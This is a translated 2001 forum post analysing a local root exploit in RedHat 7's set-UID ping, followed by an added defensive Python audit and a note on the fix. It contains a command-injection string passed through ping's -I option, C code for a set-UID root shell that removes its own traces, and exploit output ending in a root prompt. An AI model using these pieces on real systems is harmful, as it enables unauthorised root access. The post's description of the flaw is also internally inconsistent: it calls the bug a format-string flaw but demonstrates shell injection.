This post's copyright belongs to the original author; other websites reproducing it must credit the source, and traditional media reprints must contact the original author and Xici Hutong [http://www.xici.net].
Author: Babo
Published: 2001-02-24 02:00:25
Detailed analysis of the RedHat 7 local root vulnerability in ping
By: eagle

First of all, I am not publishing the exploit source code. It is already on the Internet, but I did not release it and will not be held responsible for it. Anyone who understands the principle of this vulnerability can write attack code; I am posting only a few key pieces for analysis. The code is not long and can be written in shell or Perl; I recommend shell (the importance of shell goes without saying).

Principle: this may be a major vulnerability of RedHat 7. The -I parameter of its ping allows a formatted string to execute arbitrary code. Everyone knows what permissions the ping program has:

[Hello! Sune4gle]$ ls -l /bin/ping
-rwsr-xr-x 1 root root 20604 Aug 8 2000 /bin/ping

It has the s (set-UID) bit, so there is a lot we can do with it, heh. We run ping with the -I parameter followed by an IP; the parameters in front of the IP are the key, because they are the command we execute. The s bit means that even though we run ping under the UID of an ordinary user, ping's EUID is root, so the command we execute runs with superuser privileges. So if we run the following command:

[Hello! Sune4gle]$ ping -I '; chmod o+w .' 195.117.59 &> /dev/null

the current directory becomes writable by other users, heh. Of course, we can use a sleep statement to make the process wait, and in that waiting time write a C program, compile it and run it:

cat > /xc << _EOF_
main() {
  setuid(0); seteuid(0);
  system("chmod 755 /; rm -f /x; rm -f /xc");
  execl("/bin/bash", "bash", "-i", 0);
}
_EOF_
gcc /xc -o /x
chmod 755 /x

Does everyone understand by now? I created the xc file and compiled it so that it also has the s bit, heh; it gives me a set-UID root shell. Good, here is the result of running this shell script on RedHat 7. First of all, I need an ordinary account, heh:

[Hello! Sune4gle]$ ./getroot.sh
redhat 7.0 Exploit (c) 2000 suneagle
Enjoy Hacking! :)
Phase 1: Making / world-writable...
Phase 2: Compiling helper program in /...
Phase 3: Chown Chmod on our helper program...
YE! Entering rootshell...
[Hello! root]# id
uid=0(root) gid=500(sune4gle) groups=500(sune4gle)
[Hello! root]#
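From the defender's side, the technique above leaves two things on a host that an audit can catch: a directory made world-writable and set-UID-root executables, both the one being abused (ping) and the one planted as a root shell (/x). The following audit is an added example, not code from this post or its author; it runs over a constructed temporary tree (the file names and layout are hypothetical) and, on a real host, would be pointed at "/" as root.

```python
import os
import shutil
import stat
import tempfile

def audit_tree(root, trusted_uid=0):
    """Return (suid_files, world_writable_dirs) under `root`, both sorted:
    regular files with the set-UID bit owned by `trusted_uid` (root on a real
    host; one outside the usual bin dirs is a planted root shell) and
    directories any user may write to ('chmod o+w /' leaves exactly this)."""
    suid, wwdirs = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            wwdirs.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == trusted_uid):
                suid.append(path)
    return sorted(suid), sorted(wwdirs)

def build_demo_tree():
    """Construct a throwaway tree mirroring the post-exploitation state: set-UID
    ping in bin/, world-writable top directory, set-UID 'x' dropped into it."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    os.mkdir(os.path.join(root, "bin"))
    os.chmod(os.path.join(root, "bin"), 0o755)
    for rel, mode in (("bin/ping", 0o4755), ("bin/ls", 0o755), ("x", 0o4755)):
        path = os.path.join(root, rel)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")  # placeholder body, never executed
        os.chmod(path, mode)
    os.chmod(root, 0o777)  # the post's "chmod o+w /" state
    return root

def run_demo():
    """Audit the demo tree as the current user (we own the files, so our uid
    stands in for root) and return findings relative to the tree root."""
    root = build_demo_tree()
    try:
        suid, wwdirs = audit_tree(root, trusted_uid=os.getuid())
        rel = lambda paths: [os.path.relpath(p, root) for p in paths]
        return rel(suid), rel(wwdirs)
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    print(run_demo())  # on a real host: audit_tree("/", trusted_uid=0) as root
```

The lasting fix is to stop ping from being set-UID root at all: current Linux distributions give it the cap_net_raw file capability (or rely on the net.ipv4.ping_group_range sysctl) instead, so a bug in its argument handling no longer yields root.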